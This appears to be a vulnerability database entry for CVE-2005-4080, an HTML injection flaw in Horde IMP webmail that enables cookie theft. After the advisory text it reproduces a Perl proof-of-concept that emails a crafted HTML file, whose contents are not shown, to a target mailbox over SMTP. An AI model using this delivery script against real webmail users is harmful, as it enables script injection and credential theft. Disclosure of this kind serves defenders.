CVE-2005-4080 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/15730/info Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser. # # MIME::Liet SMTP client by C3PO # use strict; use MIME::Base64; use MIME::Lite; #---------------------------------------------------- # load_file #---------------------------------------------------- sub load_file{ my($file) = shift; my($Body); open(IN, $file) || die("Can't open $file $!"); binmode IN; read(IN, $Body, -s $file); close(IN); return $Body; } #---------------------------------------------------- # main #---------------------------------------------------- my $c = load_file('\Xploits\horder\passed.htm'); #content my $m = MIME::Lite->new( From =>'[email protected]', To =>'[email protected]', Subject =>'Horde', Date =>"Tue, 17 Dec 2002 22:00:02 +0300", Type =>"text/html", Data => $c, Filename=>"horde.html", Encoding =>'base64' ); $m->attr('content-type.charset' => 'windows-1251'); #not necessary $m->send("smtp","smtp.domain.zone");